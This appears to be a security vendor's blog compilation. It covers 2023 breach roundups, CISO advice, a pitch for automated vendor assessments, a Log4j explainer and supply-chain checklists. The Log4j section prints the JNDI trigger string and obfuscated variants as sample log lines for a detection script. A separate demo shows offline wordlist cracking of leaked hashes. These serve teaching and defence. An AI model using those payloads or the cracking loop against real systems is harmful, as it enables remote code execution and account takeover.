The email addresses are what make this dataset dangerous: they let phishing campaigns be aimed at named individuals and, through them, at their employers. Login names and real names are part of a user's public Duolingo profile; email addresses are not public information.

Companies often downplay the significance of scraped data, as much of it is already publicly accessible, even if its compilation is not straightforward. However, when public data is combined with private information, such as phone numbers and email addresses, it amplifies the risk associated with the exposed data and may potentially breach data protection regulations. Facebook encountered a significant breach in 2021 when an “Add Friend” API flaw was exploited to link phone numbers to Facebook accounts for 533 million users. Subsequently, the Irish Data Protection Commission (DPC) imposed a fine on Facebook for this mishandling of scraped data.

It is also concerning that the API behind the Duolingo scrape was still openly accessible on the internet at the time of writing, even though reports of its misuse were sent to Duolingo in January. An unauthenticated endpoint that confirms whether an email belongs to an account is a vulnerability in its own right, regardless of how "public" the rest of the profile data is, and it leaves users exposed until it is fixed. Companies may downplay scraped data, but the potential for harm is real, and closing an enumeration oracle is cheap compared with the fallout.

Discord.io:

On August 14, 2023, Discord.io, an unofficial service that provides custom invite links and redirects to Discord servers, suffered a significant data breach. A threat actor using the handle "Akhirah" surfaced the breach by offering the database for sale; it holds personal information of more than 760,000 users.

The stolen data includes usernames, Discord IDs, email addresses, and passwords that were salted and hashed. Salting and hashing are not encryption: there is nothing to "decrypt", but an attacker holding the database can guess passwords offline against each hash, and weak or reused passwords will fall quickly. Discord.io has urged users to change their passwords; users should also retire that password anywhere else they reused it.
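An added example (not Discord.io's code; the wordlist and passwords are constructed, and the cost model is simplified to counting hash invocations) shows why the distinction matters: a leaked record protected by a salted but fast hash falls to a small wordlist at a cost of one hash per guess, the same password behind PBKDF2 costs the attacker the full work factor per guess, and a password that is not in the wordlist is not recovered at all.

```python
"""Why 'salted and hashed' is not 'safe': offline guessing against a fast hash
versus a slow KDF. Added example for this post; wordlist and passwords are
constructed and the cost model is simplified to counting hash invocations."""
import hashlib
import hmac
import os
from dataclasses import dataclass
from typing import Iterable, Optional

WORDLIST = ["123456", "qwerty", "password123", "letmein"]  # constructed mini wordlist


@dataclass
class StoredCredential:
    algo: str         # "sha256": salted fast hash (what not to do); "pbkdf2": slow KDF
    salt: bytes
    digest: bytes
    iterations: int   # work factor; 1 for a plain hash


def _derive(algo: str, password: str, salt: bytes, iterations: int) -> bytes:
    if algo == "sha256":
        return hashlib.sha256(salt + password.encode()).digest()
    if algo == "pbkdf2":
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    raise ValueError(f"unknown algorithm {algo!r}")


def store_password(password: str, algo: str = "pbkdf2", iterations: int = 100_000,
                   salt: Optional[bytes] = None) -> StoredCredential:
    """Salt is random per user, so identical passwords yield different digests and a
    precomputed table for one user is useless for the next. 100k PBKDF2 iterations keeps
    this demo quick; OWASP's 2023 guidance for PBKDF2-HMAC-SHA256 is 600k, and Argon2id,
    scrypt or bcrypt are preferred where available."""
    salt = os.urandom(16) if salt is None else salt
    if algo == "sha256":
        iterations = 1
    return StoredCredential(algo, salt, _derive(algo, password, salt, iterations), iterations)


def verify_password(cred: StoredCredential, attempt: str) -> bool:
    """Constant-time comparison; the work factor is paid on every login attempt too."""
    return hmac.compare_digest(cred.digest, _derive(cred.algo, attempt, cred.salt, cred.iterations))


def offline_crack(cred: StoredCredential, wordlist: Iterable[str]) -> tuple[Optional[str], int]:
    """Attacker with the leaked record: try every guess against this user's salt.
    Returns (recovered password or None, cost), where cost counts hash invocations
    the attacker had to pay, so it scales with the work factor per guess."""
    cost = 0
    for guess in wordlist:
        cost += cred.iterations
        if hmac.compare_digest(cred.digest, _derive(cred.algo, guess, cred.salt, cred.iterations)):
            return guess, cost
    return None, cost


if __name__ == "__main__":
    weak_fast = store_password("password123", algo="sha256")
    weak_slow = store_password("password123", algo="pbkdf2")
    strong = store_password("correct horse battery staple 7#")
    print("salted sha256:", offline_crack(weak_fast, WORDLIST))
    print("pbkdf2 100k:  ", offline_crack(weak_slow, WORDLIST))
    print("strong pw:    ", offline_crack(strong, WORDLIST))
```

The salt stops one precomputed table from serving every user, and the constant-time comparison avoids leaking the digest through timing, but neither changes the arithmetic of offline guessing; only the per-guess work factor (or a memory-hard KDF such as Argon2id or scrypt) does, and even that only buys time for weak passwords. That is why the advice after a breach like this is to change the password and retire it everywhere it was reused.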

Discord.io has taken the unprecedented step of indefinitely suspending its operations in response to the breach. Visitors to the Discord.io website now encounter a message detailing the seriousness of the breach. The company is being transparent about the compromised data fields, aiming to provide affected users with clarity regarding the information exposed and what remains secure in the wake of this incident.

“We have canceled existing premium subscriptions, and we will be reaching out to affected users individually. As of now, we have not been contacted by those responsible for the breach, nor have we initiated contact with them. To our knowledge, the database has not been made public at this time.” – Discord.io

In an interview, Akhirah said they wanted Discord.io to remove malicious content from its platform and to get in touch to resolve those issues, and claimed not to be seeking retribution or a reward.

This data breach follows a similar trend in the cybersecurity landscape. Just recently, the LetMeSpy Android Spyware Service also announced its permanent shutdown following a successful breach by a hacker who gained access to user data.

SEIKO: 

Seiko Group Corporation, the long-established Japanese watch and electronics group with roughly 12,000 employees, has officially acknowledged a possible data breach.

On August 10th, the company posted a data breach notification on its website. However, cybersecurity experts only recently became aware of the breach after the ransomware group BlackCat featured SEIKO on its data leak platform.

SEIKO did not provide specific details but referred to the cybersecurity incident as a “potential” data breach.

According to SEIKO, “On July 28th of this year, the company experienced a potential data breach. It appears that unauthorized individuals or parties gained access to at least one of our servers.”

ALPHV/BlackCat, which has since claimed the breach, shared several files on its data leak site as evidence. Among them was what appeared to be a copy of the passport of Yoshikatsu Kawada, a director at Seiko Watch Corporation, the group's watch subsidiary.

After an external cybersecurity expert examined the incident, SEIKO determined that a breach occurred, and some of the company’s information may have been compromised.

“At present, we are in the process of confirming the precise nature of the information stored on the affected servers. Once our ongoing investigation yields more specific results, we will promptly provide an update,” the company stated. However, no further updates regarding the breach have been made available thus far.

About ALPHV/BlackCat Ransomware:

ALPHV/BlackCat ransomware first emerged in late 2021. Like many of its peers, the group runs a ransomware-as-a-service (RaaS) operation, supplying the malware and leak site to affiliates who carry out the intrusions. Notably, its ransomware is written in Rust, which was unusual among ransomware families at the time.

According to an analysis by Microsoft, threat actors associated with this ransomware were known to collaborate with other prominent ransomware families such as Conti, LockBit, and REvil.

The FBI has suggested that money launderers affiliated with the ALPHV/BlackCat cartel have ties to Darkside and Blackmatter ransomware cartels, indicating a well-established network of operatives within the RaaS sector.

Recently, ALPHV/BlackCat has been notably active among ransomware groups. According to cybersecurity analyst ANOZR WAY, the group was responsible for approximately 12% of all attacks in 2022.

This gang appears to have recently focused its efforts on professional service providers. In mid-May, it claimed responsibility for breaching Mazars Group, an international firm specializing in auditing, accounting, and consulting services.

Forever 21:

Clothing and accessories retailer, Forever 21, is in the process of sending data breach notifications to over half a million individuals whose personal information was exposed to unauthorized intruders. The company operates a global network of 540 outlets and has a workforce of approximately 43,000 employees.

A portion of the data breach notification, shared with the Office of the Maine Attorney General, reveals that the company detected a cyberattack on multiple systems on March 20. The investigation unveiled that hackers had sporadic access to Forever 21 systems between January and March of this year and utilized this access to pilfer data.

“The investigation determined that an unauthorized third party accessed specific Forever 21 systems at different intervals between January 5, 2023, and March 21, 2023,” states the notice. “Results from the investigation indicate that the unauthorized third party acquired specific files from certain Forever 21 systems during this timeframe” – Forever 21.

The data breach notice, dispatched on August 29 to 539,207 affected individuals, lists the following potentially exposed data types:

  • Full names

  • Social Security Numbers (SSN)

  • Dates of Birth

  • Bank Account Numbers

  • Forever 21 Health Plan information

BleepingComputer reached out to Forever 21 to ascertain if the security incident impacted both customers and employees. A spokesperson from the company issued the following statement: “The incident was limited to current and former Forever 21 employees and did NOT affect personal data pertaining to Forever 21 customers.”

In the notice, Forever 21 reports that they have taken steps to ensure that the hackers have deleted the stolen data, implying that the company may have engaged in communication with the attacker. Such actions often occur following ransomware attacks, where the victim negotiates with the hackers to reach a reasonable ransom. However, it is important to note that a ransomware attack on Forever 21 has not been confirmed.

In November 2017, Forever 21 informed its customers of another data breach affecting its payment system, resulting in the compromise of card data from transactions made between March and October 2017.

Italian Banks Temporarily Disabled by Distributed Denial of Service (DDoS) Attacks:

Several banks in Italy recently experienced temporary outages due to targeted Distributed Denial of Service (DDoS) attacks.

On August 1st, the Agenzia per la Cybersicurezza Nazionale (ACN) announced that it had identified cyberattacks against at least five banks in the country, resulting in a temporary disruption of their services.

The affected banks included BPER Banca (EMII.MI), Intesa Sanpaolo (ISP.MI), FinecoBank (FBK.MI), Popolare di Sondrio (BPSI.MI), and Monte dei Paschi di Siena (BMPS.MI).

According to the ACN, it “detected the resurgence of distributed denial of service (DDoS) attack campaigns carried out by pro-Russian… groups targeting national institutional entities.” The ACN attributed the attacks to the Russian hacking group known as “NoName.”

An employee from one of the affected banks informed Reuters that the bank’s website was taken offline due to a substantial surge in traffic. However, the bank’s mobile app continued to function normally during the attack, and the website was restored after a brief period.

The ACN stated that it provided assistance to all those affected by the DDoS attacks launched by NoName.

What Are DDoS Attacks?

Distributed Denial of Service (DDoS) attacks flood a target with traffic from many sources at once so that its infrastructure spends its capacity on junk instead of on legitimate users. Volumetric attacks saturate network bandwidth; application-layer attacks exhaust server resources such as CPU or connection tables with requests that look legitimate individually. Either way, real users can no longer reach the site. Here the banks' websites went down while their mobile apps kept working, which is consistent with a flood aimed at the public web front end rather than at backend systems.

DDoS attacks have varied motives, from extortion to the hacktivism of pro-Russian groups like NoName, but the immediate objective is the same: knock a specific organization offline for as long as the flood can be sustained. Because the damage is disruption rather than data theft, defence centres on absorbing or filtering the traffic upstream (CDN or scrubbing services, rate limiting, filtering by geography or network) and on keeping critical channels on capacity the attacker is not hitting.

Moving Forward:

Data breaches can have severe consequences for both companies and individuals, including financial loss, reputational damage, and identity theft. As the frequency and sophistication of cyberattacks continue to increase, it is crucial for companies to prioritize data protection and implement robust security measures. By staying vigilant and proactive in their approach to cybersecurity, organizations can minimize the risk of a data breach and protect their customers’ trust.


The Top 10 Things Every CISO Should Know


What Every CISO Should Know in 2023 to Protect Their Business


In our rapidly evolving digital age, the role of a Chief Information Security Officer (CISO) has never been more crucial. As a CISO, your role stretches far beyond traditional IT security measures. You are the protector of your organization’s most valuable assets, from intellectual property to customer data. The following insights delve deeper into what every CISO should know in 2023 to ensure they’re at the forefront of safeguarding their business.


1. Grasping the Business

Understanding your business inside out is paramount. The best CISOs fully comprehend the company’s goals, mission, and operational mechanics. Why is this so vital? Because only with this understanding can you adequately prioritize and champion security initiatives. Furthermore, by aligning security measures with business goals, you ensure that security is not viewed as a roadblock but rather an enabler of growth and success.


2. Emphasizing Effective Risk Management

Risk management isn’t just a box to tick; it’s a continual process. This involves constant vigilance—identifying emerging threats, assessing their potential impact, and implementing controls to counteract them. Today’s cyber threats are dynamic, with cybercriminals using sophisticated techniques that change by the minute. Hence, regular risk assessments and updates are non-negotiable. But, just as crucial is the art of communication. The ability to articulate these risks, along with their potential implications to the board and executives, can make the difference between proactive action and reactive damage control.


3. Moving Beyond Compliance

While regulatory compliance is essential, in 2023, it’s merely a starting point. With the ever-evolving threat landscape, relying solely on regulations and standards can render a business vulnerable. It’s like only installing a front door lock while leaving all the windows open. Instead, a proactive approach, involving continuous assessment and adaptation of security measures to the unique needs and threats faced by your organization, is pivotal.


4. Championing Security Awareness

The human factor can often be the weakest link in any security chain. As such, empowering every single employee with the knowledge and tools to act as the first line of defense is vital. This means ongoing training, regular reminders, and cultivating a culture where security is everyone’s business. Remember, from the receptionist to the CEO, everyone can either be an asset or a vulnerability.


5. Harnessing the Power of Effective Communication

Clear, concise, and compelling communication can be one of the most potent tools in a CISO’s arsenal. It’s essential to translate the often complex world of security into language that everyone—from the tech newbie to the seasoned board member—can grasp. Regularly updating stakeholders about security postures, potential risks, and ongoing initiatives not only fosters trust but also reinforces the importance of collective vigilance.


Expanding the CISO’s Toolkit in 2023:

But let’s push the envelope further. In addition to the critical pointers above, CISOs in 2023 should be aware of:


6. Embracing the Cloud and Zero Trust: 

As businesses transition to cloud infrastructures, understanding cloud security best practices becomes paramount. Moreover, adopting a Zero Trust approach—where every access request is fully authenticated, authorized, and encrypted before granting access—ensures layered defense in a distributed work environment.


7. Machine Learning and AI:

Cybercriminals are leveraging AI; so should you. Machine learning can help with anomaly detection, surfacing potential threats faster than any human could, and with predictive analytics. Findings not only automates assessments and the auditing process for all of your company's vendors, but also offers real-time updates on your risk posture powered by RiskRecon and Anomali.


8. Regular Penetration Testing:

Gone are the days when an annual penetration test sufficed. Regularly challenging your systems can expose vulnerabilities before cybercriminals exploit them.


9. Incident Response Preparedness:

It’s not about if, but when a breach might occur. Having a well-rehearsed incident response plan ensures rapid containment, minimizing potential damage.


10. Collaborative Security:

Partnering with other businesses, industry groups, and governmental bodies can provide invaluable intelligence and resources. Cybersecurity is a collective endeavor.


In conclusion, being a CISO in 2023 means juggling many balls—compliance, risk management, employee training, effective communication, technological advancements, and more. The threat landscape might be challenging, but with the right approach, tools, and mindset, CISOs can ensure their organizations are robustly defended and primed for growth.



Benefits of Automating Security Assessments for Your Organization


Companies that fail to leverage automated tools are overlooking significant opportunities, and this holds particularly true for security and compliance. Companies are finding it increasingly challenging to proactively identify, address, and mitigate security issues, since, well, there are more threats than ever. Conducting regular security assessments is essential to detect vulnerabilities and reduce the risk of future breaches. However, relying on manual methods and outdated procedures is unreliable and diminishes the effectiveness of risk mitigation strategies. To ensure secure and robust networks, as a business leader you must prioritize the implementation of automated security assessments. They minimize risk exposure, shorten the sales cycle, save the company money, and strengthen cybersecurity defenses, which makes them a crucial investment.

(Source: CISA – Continuous Diagnostics and Mitigation Learning Program: Benefits of Automating Security Control Assessments)

Automation Speeds Up Reaction and Activity:

Automation plays a vital role in streamlining processes and driving transformation in modern industries. By automating risk assessment and risk management, organizations can make informed financial decisions, streamline risk and compliance procedures, and enhance their overall risk profile. Automation reduces human error, enables faster response times, and promotes growth. Real-time threat information and risk reports empower security teams to handle threats more effectively and improve response and action times. Automated risk management strategies can efficiently compile, classify, upload, and organize incoming data, which allows for the identification of similar incidents and the execution of prepared actions or responses.

Enhanced Cybersecurity Risk Management:

Automated assessments provide organizations the ability to manage cybersecurity risks more comprehensively and effectively. These assessments offer security teams up-to-date and detailed data about ALL their vendors that can be shared with senior management and executives. By eliminating manual tasks and enabling real-time monitoring, automation allows risk managers to focus on risk avoidance and mitigation. Furthermore, automation expedites the entire risk management process by instantly uploading fresh data and promptly reporting any issues. Through continuous monitoring and real-time visibility, organizations can identify gaps in their cybersecurity posture and take the necessary security measures to rectify them.

Standardizing Data and Improving Collaboration:

In many organizations, different departments rely on separate and potentially incompatible data to analyze and assess cyber risks. With so much data floating around in different hands, conflicting reports create confusion among managers. Automated security assessments provide a centralized platform for data collection, ensuring consistent and standardized data across the organization. This eliminates discrepancies and enables effective collaboration among departments. Executives and managers can access accurate and comprehensive information, leading to better-informed decision-making and improved cyber risk management strategies.

Scaling Security Risk Assessment:

Automation significantly simplifies the scalability of security risk assessment processes within a company. Automated assessment platforms like Findings are designed to handle both small and large-scale tasks, allowing organizations to adapt to changing demands without the need for hiring and training new personnel. Predictability is another advantage of automation, as most response actions can be anticipated, making it easier to manage various system interactions securely. Additionally, automation provides better tracking capabilities, allowing organizations to monitor progress, identify completed assessment components, and address pending tasks more efficiently.

Measuring ROI of Automation:

Calculating the return on investment (ROI) for automated security risk assessment involves considering the time and resources saved by automating time-consuming tasks and preventing adverse outcomes. While evaluating the ROI for automated security risk assessment may differ from other business operations, the goal is to demonstrate to IT management that the investment was worthwhile, considering the resources and time allocated.

Out With the Old, in With the New:

In today’s digital landscape, where cyberattacks are a constant threat, automating security assessments is not just beneficial but imperative for organizations aiming to protect their assets, maintain customer trust, and ensure business continuity. It is an investment that pays off in terms of enhanced security, streamlined processes, and improved risk management.

Collaborating with companies like Findings – who specialize in security risk assessment automation can help organizations identify weaknesses and risks more effectively. Automated security risk assessments provide a proactive approach to maintaining the security of organizational systems, preventing potential breaches, and ensuring a safe operating environment. By leveraging automation, organizations can improve response times, standardize data, enhance collaboration, and scale security risk assessment processes. It is crucial for businesses to embrace automation.



What is Log4j vulnerability? Do you need to worry?


The Log4j vulnerability, CVE-2021-44228, became public on December 9, 2021.

This easily triggered vulnerability gives an attacker remote code execution (RCE) on any system that logs attacker-controlled input through a vulnerable version of Apache Log4j 2. Other products that bundle Log4j, such as Apache Solr, are affected as well.

The trigger is simply getting the string ${jndi:ldap://<attacker's server>/a} logged: Log4j's message lookups resolve the JNDI reference, fetch a Java object from the attacker's LDAP (or RMI) server and execute it. The flaw affects Log4j 2.0-beta9 through 2.14.1 (the fix shipped in 2.15.0-rc1 was incomplete), and the library is embedded in enterprise software and cloud services across every industry. Unless fixed, it gives an easy foothold on internal networks that can end in data theft, malware deployment, destruction of critical information, and more.
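Detection is harder than searching logs for `${jndi:`, because Log4j resolves nested lookups before the JNDI one fires, and attackers used that to hide the trigger: `${${lower:j}ndi:...}`, `${${env:NOPE:-j}ndi:...}` and percent-encoded variants in request URIs all reach the vulnerable code path. The added example below (written for this post, not Apache's code; the access-log lines are constructed and use documentation-range IP addresses) URL-decodes each line, collapses `lower`/`upper` and default-value lookups from the inside out, and only then checks for the JNDI prefix.

```python
"""Detecting Log4Shell lookup strings in log lines, including obfuscated forms
that defeat a naive search for '${jndi:'. Added example for this post; the log
lines are constructed and use documentation-range (198.51.100.0/24) addresses."""
import re
from urllib.parse import unquote

# Innermost lookups only (no nested '${' or '}' inside), so repeated passes
# resolve ${${lower:j}ndi:...} from the inside out.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")   # ${env:X:-j} or ${::-j} -> j
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

SAMPLE_LOGS = [  # constructed access-log lines
    '198.51.100.20 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '198.51.100.21 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.22 - - [10/Dec/2021:03:15:02 +0000] "GET /?q=${${lower:j}ndi:${lower:rmi}://198.51.100.7/x} HTTP/1.1" 404 0',
    '198.51.100.23 - - [10/Dec/2021:03:15:30 +0000] "GET / HTTP/1.1" 200 612 "-" "${${env:NOPE:-j}${env:NOPE:-n}${env:NOPE:-d}${env:NOPE:-i}:ldap://198.51.100.7/a}"',
    '198.51.100.24 - - [10/Dec/2021:03:16:11 +0000] "GET /%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 404 0',
    '198.51.100.25 - - [10/Dec/2021:03:16:40 +0000] "GET /?msg=Invoice%20${amount}%20due HTTP/1.1" 200 88',
]


def normalize(text: str, max_rounds: int = 16) -> str:
    """URL-decode (repeatedly, for double encoding), then collapse lower/upper and
    default-value lookups until the string stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        resolved = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        resolved = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), resolved)
        if resolved == text:
            break
        text = resolved
    return text


def contains_jndi_lookup(line: str) -> bool:
    """True if the line, once normalized, carries a JNDI lookup prefix."""
    return _JNDI.search(normalize(line)) is not None


def flagged_lines(lines) -> list[int]:
    """Indices of lines that should be investigated as Log4Shell attempts."""
    return [i for i, line in enumerate(lines) if contains_jndi_lookup(line)]


if __name__ == "__main__":
    for i in flagged_lines(SAMPLE_LOGS):
        print(f"line {i}: {normalize(SAMPLE_LOGS[i])}")
```

This is a detection heuristic, not a fix: Log4j's lookup grammar is richer than the two forms handled here, so treat a clean scan as absence of evidence rather than evidence of absence. Patching, or removing the JndiLookup class, is what actually closes the hole.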

This vulnerability is so critical that it received the maximum CVSS score of 10.0.

Fortunately, not everyone is affected, and mitigation is straightforward: upgrade to a fixed Log4j 2 release or, where that cannot happen immediately, remove the JndiLookup class from the log4j-core jar (the workaround Apache itself recommended for older versions). First, though, check whether you are exposed, using Findings' free log4j VDaaS tool.

For more information, visit our log4j information page.

A Complete Checklist To Supply Chain Security


Cybersecurity compliance frameworks and standards are a great starting point for managing supply chain security risks. But if your security strategy hinges solely on frameworks, you’re doing it wrong.

As The Cybersecurity Place puts it, “compliance alone won’t save you” from modern security risks.

Indeed, while embracing a cybersecurity framework is an important — and, for many organizations, necessary — first step toward securing the supply chain, businesses shoot themselves in the foot if they stop with framework adoption alone. No matter which framework you use internally, or which frameworks you require your vendors to comply with, the framework on its own is of limited value. You must also implement processes that actually operationalize the framework, allowing you to enforce compliance among your vendors.

Let’s take a look at what goes into a complete supply chain security strategy. As we’ll see, it starts with cybersecurity frameworks like NIST and ENISA, but it extends far beyond those frameworks alone.

The core components of a cybersecurity framework: The NIST example

Cybersecurity frameworks are an excellent foundation that helps businesses define overarching supply chain security principles.

For example, the NIST Cybersecurity Framework, which is popular among U.S. companies (European companies often lean on ENISA guidance and ISO/IEC 27001, which cover similar ground), organizes its requirements around five core functions:

  • Identify: NIST requires processes that allow organizations to identify and understand their cybersecurity risks, including those introduced by suppliers.
  • Protect: After risks have been identified, NIST requires businesses to take steps to mitigate them in order to improve their cybersecurity posture.
  • Detect: As not all risks can be identified and mitigated, NIST also requires ongoing efforts to detect active threats.
  • Respond: When active threats have been detected, NIST requires responses that can contain and eliminate them.
  • Recover: Finally, NIST requires plans for restoring any capabilities or services that an incident impaired.

By adopting a framework like NIST or ENISA, then, businesses gain a high-level architecture that helps them plan a cybersecurity strategy.

Processing tools for supply chain security

The main limitation of frameworks alone is that they provide little if any specific guidance on how to turn high-level cybersecurity principles into practice. As a result, businesses also need to implement security processing tools that allow them to operationalize cybersecurity practices in ways that align with framework requirements.

Processing tools do this in the context of supply chain security by providing:

  • Vulnerability assessment: Processing tools identify risks within the products and services that third-party vendors supply to a business.
  • Coverage assessment: Processing tools help identify situations where vendors lack effective cybersecurity coverage.
  • Visibility assessment: Processing tools enable businesses to profile their vendors and suppliers in order to understand which risks exist within their systems — and which risks could, by extension, flow down the supply chain.
  • Business alignment: With processing tools, businesses can determine which risks in the supply chain pose the greatest threats to their operations. This context is essential because not all vendors and risks are of equal importance within a supply chain.

By providing this functionality in an automated way, processing tools go far in closing the gap between principle and practice. Indeed, as the SANS Institute says, automation is the only way to enforce security compliance mandates in complicated contexts like supply chains.

Managing contractual requirements

What do you do when processing tools reveal that vendors are not fully adhering to your cybersecurity requirements?

That’s where contracts and evidence come into play. Companies must maintain documents and signatures related to the security frameworks they adopt within their supply chains, then use them to enforce compliance when violations occur. Contracts also play an important role in determining which disclosures are required in the event of a supply chain breach.

Remember to update your contracts if, for example, you adopt a newer version of a cybersecurity framework or change your supply chain in a way that imposes new compliance requirements or verifications.

Most large organizations manage contractual requirements through a dedicated security team or CISO. At smaller organizations, a procurement team or IT team typically handles this responsibility. Your specific approach to vendor contract management is not as important as ensuring there is a systematic process in place for defining and enforcing contractual security agreements across your supply chain.

Supply chain security management: Responding to a crisis

The final key step in managing supply chain risks is having a plan in place to respond to incidents when they occur. You don’t want to wait for a breach to decide what to disclose, or how to contain the threat and so on.

Your response plan should define the following points:

  • Who will perform which tasks in response to an incident. Remember that many incidents require responses not just from technical stakeholders, but from other departments such as the legal, PR and others.
  • Which vendors you will use as a backup in the event that one key vendor is breached.
  • How the response will be documented.
  • How you will determine whether public disclosure of a breach is required, and how you will manage that disclosure.

In addition to developing a response plan, run drills so that your team can practice responding to a supply chain breach, before a real-life incident occurs. You should also strive to keep your team focused on the big picture. As you can’t predict the exact nature of a breach, it’s best to learn how to think holistically and creatively about managing incidents, rather than investing in rote reaction plans that may be too specific to apply to a given incident.

Last but not least, ensure that you have a response plan that will allow you to react quickly and effectively when a major security incident occurs within your supply chain. Your goal should be to resolve the incident in a way that protects your operations, customers and reputation, while also demonstrating to partners that supply chain security is a key priority.

How Your Competitors Are Preventing Supply Chain Attacks

How Your Competitors Are Preventing Supply Chain Attacks | Findings.co

Supply chain security threats are like the flu: Sooner or later, they’re bound to impact you, no matter how hard you try to avoid them.

Indeed, by their very nature, supply chain attacks are more likely to affect large numbers of organizations than most other types of breaches. The majority of cyber threats target individual companies. But a single supply chain attack could impact hundreds or thousands of businesses at once if it compromises software or data within their supply chains.

For proof of just how pervasive supply chain security risks are, you need only look at recent examples. The SolarWinds breach impacted dozens of organizations, including major U.S. federal agencies. The Kaseya breach extended to thousands of businesses spread throughout the world that use Kaseya’s software. Expect more figures like these as the prevalence of supply chain attacks — a threat that one major security research report called “staggeringly high” — continues to grow at rates approaching 400 percent.

That’s the bad news. The good news is that, as explained below, there are effective steps you can take to protect your business from supply chain risks. They won’t completely guarantee immunity from attack, but they’ll go a long way toward mitigating the threat.

Why are supply chains so risky?

The first step in managing supply chain threats is understanding what makes supply chains inherently risky.

The reasons are simple enough: Supply chains typically involve many suppliers, and it’s difficult to maintain visibility into the security state of each of them.

By comparison, it’s relatively easy to secure your own IT assets — meaning those you deploy and manage yourself. But it’s much harder to ensure that your vendors’ and suppliers’ IT environments are secure — especially when you have dozens or hundreds of vendors in your supply chain.

Managing supply chain security: The typical response

The typical playbook for managing supply chain risks includes some basic steps:

  • Compliance: Requiring suppliers to adhere to cybersecurity standards like the U.S. government’s NIST framework or the E.U.’s ENISA/ISO can help to reduce the prevalence of threats. But actually enforcing compliance across third-party vendors’ businesses can be difficult.
  • Vetting: Businesses often enforce vetting processes for new vendors. That’s good, but it doesn’t guarantee that you’ll avoid risks once a vendor relationship has already been established.
  • Cybersecurity teams: Investing in cybersecurity expertise can help harden IT assets against attack. But your own cybersecurity experts can’t do much to protect the assets of your vendors.

These are all useful strategies for managing supply chain risks. But they’re not enough on their own to make your security posture as strong as possible.

Going further to secure the supply chain

Beyond those basic supply chain security steps, businesses should implement additional measures to make their supply chains as safe as possible.

Access control

Businesses should implement tight access controls to govern who can access their systems. Access should be defined in a granular way and restricted by the principle of least privilege.

In many countries, regulations make supply chain cyber security a legal requirement: companies must comply with a security framework and checklist, and once that checklist is completed the vendor can demonstrate that stronger controls are in place. While strong access controls won’t eliminate risks in your supply chain, they will reduce the chances that a vendor’s cybersecurity problem becomes your cybersecurity problem.

Technology investment

Given the complexity and scale of modern supply chains, managing their security manually is not feasible in most cases. That’s why it’s wise to invest in tools that are purpose-built to assess and manage supply chain risks automatically, across all vendors’ IT estates.

Maximum visibility and coverage

Along similar lines, businesses should leverage automation technology to maximize their ability to identify and track security risks within their supply chains. This is also a process that you can’t handle manually unless you have a very simple supply chain.

Vendor Education

In addition to asking your vendors to be secure, consider providing educational resources that explain exactly how they should secure their assets. These resources could be based on the cybersecurity standards that you want to enforce across your supply chain. A vendor’s transparency, should a breach occur, could also provide valuable feedback to others in that supply chain.

Assess vendor risk

Not all vendors pose the same level of risk. Risks vary depending on which types of data and applications the vendors supply or integrate with, and how important the vendors are to your business.

This means you should contextualize vendor risk and enforce security safeguards accordingly. High-risk vendors may require stronger oversight than those whose assets play a less central role in your operations.

Cybersecurity drills

Planning how to respond to a supply chain breach, then practicing the response via cybersecurity drills, goes a long way toward helping ensure a fast and effective resolution when attacks occur. In particular, your response plan and drills should address:

  • Business risks: It should be easy to identify which parts of the business are impacted by a breach and what level of risk their disruption poses to the overall business.
  • Manual vs. automated processes: Which response processes can be automated, and which will need to be performed manually? You’ll want to answer these questions before the breach occurs.
  • Mediation: Which teams or stakeholders will take the lead in managing a supply chain breach? If your organization does not have a CISO in place, then another person from either procurement or the I.T. department could be appointed. Immediate decision-making in a crisis is critical.
  • Disclosure: How will you announce a breach to your customers and partners? How much information should you include about the breach? Different types of breaches and vendors may require different disclosures.

Response drills prepare you to remove risky components from your supply chain rapidly with minimal disruption to business operations.

Supply chain assessment

The most secure business is one that continuously assesses its supply chain to identify its weakest links from a security perspective. Again, not all vendors pose the same level of risk, and not all vendors can be assessed in the same way. You must implement an assessment process tailored to your particular supply chain.

As CIO Review explains, “While threats cannot be completely eliminated, supply chain security can contribute to a more secure, efficient flow of goods that can recover quickly from disruptions.”

In other words, the fact that supply chain security is impossible to guarantee completely is not an excuse for ignoring it. It’s absolutely critical not only to take basic steps to defend your supply chain, but also to implement advanced measures — such as practicing responses and automating supply chain visibility as much as possible — that can bring your risks as close as possible to zero.
